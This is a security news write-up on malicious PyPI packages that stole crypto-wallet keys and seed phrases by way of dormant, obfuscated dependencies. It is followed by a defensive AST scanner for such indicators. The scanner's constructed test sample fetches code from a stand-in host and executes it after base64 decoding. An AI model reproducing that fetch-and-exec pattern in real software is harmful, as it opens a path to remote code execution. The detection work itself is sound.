Crypto Wallets Targeted Using Malicious PyPI Packages

The packages appeared to offer useful functionality for users recovering or managing crypto wallets. They were instead designed to covertly steal wallet data, including private keys and mnemonic phrases. With that data, attackers can swiftly drain cryptocurrency wallets or, worse, monitor the wallets and exploit them over time without the users’ knowledge.

To disguise their malicious intent and avoid detection, the packages themselves carried no malicious code. Instead, the code was spread across a series of underlying dependencies and fetched only once certain conditions were met. This use of dependencies created an effective smokescreen that let the top-level packages appear harmless.

A second evasion technique: unlike most malicious packages delivered through PyPI, these do not activate automatically on installation but remain dormant until certain functions are called. Most methods of detecting malicious software on a system rely on monitoring application activity and identifying anomalies. Since the package does nothing until one of those functions is triggered, it can pass unnoticed during installation.

Even within the underlying dependencies where the malicious code lies, that code is heavily obfuscated. The obfuscation makes it hard for automated security tools and human reviewers alike to quickly identify the package’s true intent.

The attacker also retrieved dynamically any information the program needed to function, so the code contains nothing hardcoded that could lead back to the attacker or their command-and-control servers. This also hampers static code analysis and lets the attacker change infrastructure without modifying the packages themselves.
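As an added example (not code from the article or from the packages it describes), a small AST heuristic that flags the indicators the article lists in a Python source file: code executed from a string built or decoded at run time, and network fetches placed inside a function body so they fire only when that function is called rather than at install or import time. The two sample sources are constructed for illustration.

```python
import ast

EXEC_LIKE = {"exec", "eval", "compile"}
DECODERS = {"b64decode", "b85decode", "decompress", "unhexlify"}
FETCHERS = {"urlopen", "urlretrieve"}  # stdlib fetch helpers, by bare name

def _name(call):
    """Bare name of the function being called: exec, b64decode, urlopen, ..."""
    f = call.func
    return f.id if isinstance(f, ast.Name) else f.attr if isinstance(f, ast.Attribute) else None

class _Scanner(ast.NodeVisitor):
    def __init__(self):
        self.findings, self.depth = [], 0  # depth > 0 while inside a def body

    def visit_FunctionDef(self, node):
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1
    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Call(self, node):
        if _name(node) in EXEC_LIKE and node.args:
            arg = node.args[0]
            if not isinstance(arg, ast.Constant):  # code built at run time, not a literal
                self.findings.append(("exec-of-dynamic-code", node.lineno))
            if any(isinstance(n, ast.Call) and _name(n) in DECODERS for n in ast.walk(arg)):
                self.findings.append(("exec-of-decoded-payload", node.lineno))
        if _name(node) in FETCHERS and self.depth > 0:  # fetch deferred until a function runs
            self.findings.append(("deferred-network-fetch", node.lineno))
        self.generic_visit(node)

def scan_source(src):
    """Return sorted (indicator, line) findings for one Python source string."""
    scanner = _Scanner()
    scanner.visit(ast.parse(src))
    return sorted(scanner.findings, key=lambda f: (f[1], f[0]))

# Constructed samples (not real package code): one benign, one matching the pattern.
BENIGN = "import json\ndef load(p):\n    with open(p) as f:\n        return json.load(f)\n"
SUSPICIOUS = ("import base64, urllib.request\ndef restore_wallet(seed):\n"
              "    blob = urllib.request.urlopen('http://example.invalid/s2').read()\n"
              "    exec(base64.b64decode(blob))\n")

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_source(src))
```

These are triage heuristics, not proof of malice: a legitimate plugin loader can trip the first rule, so findings should route a package to manual review rather than block it outright.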